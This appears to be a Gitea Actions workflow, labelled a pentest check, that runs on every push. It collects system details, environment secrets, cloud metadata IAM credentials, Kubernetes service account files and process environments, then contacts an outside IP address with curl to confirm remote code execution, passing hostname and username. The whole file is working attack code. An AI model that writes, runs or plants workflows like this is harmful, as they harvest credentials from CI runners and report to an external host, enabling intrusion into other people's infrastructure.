security-test/.gitea/workflows/recon.yml

name: pentest-ssrf-check
on: [push]
jobs:
  recon:
    runs-on: ubuntu-latest
    steps:
      - name: System Info
        run: |
          echo "=== PENTEST SSI BASS PAGO ==="
          id && hostname && uname -a
          cat /etc/os-release 2>/dev/null | head -5
          ip addr 2>/dev/null || ifconfig 2>/dev/null
          cat /etc/hosts
          cat /etc/resolv.conf
          env | sort | grep -iE "KEY|SECRET|TOKEN|PASS|AUTH|DB|REDIS|URL|HOST|GITEA" | head -30
          curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null || echo "No AWS metadata"
          curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || echo "No IAM role"
          ls -la /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null || echo "No K8s"
          cat /proc/1/environ 2>/dev/null | tr 0 n | head -20 || echo "No proc environ"
          # Callback to VPS to confirm execution
          curl -s "http://144.172.101.121:8888/gitea-actions-rce?host=$(hostname)&user=$(whoami)" || true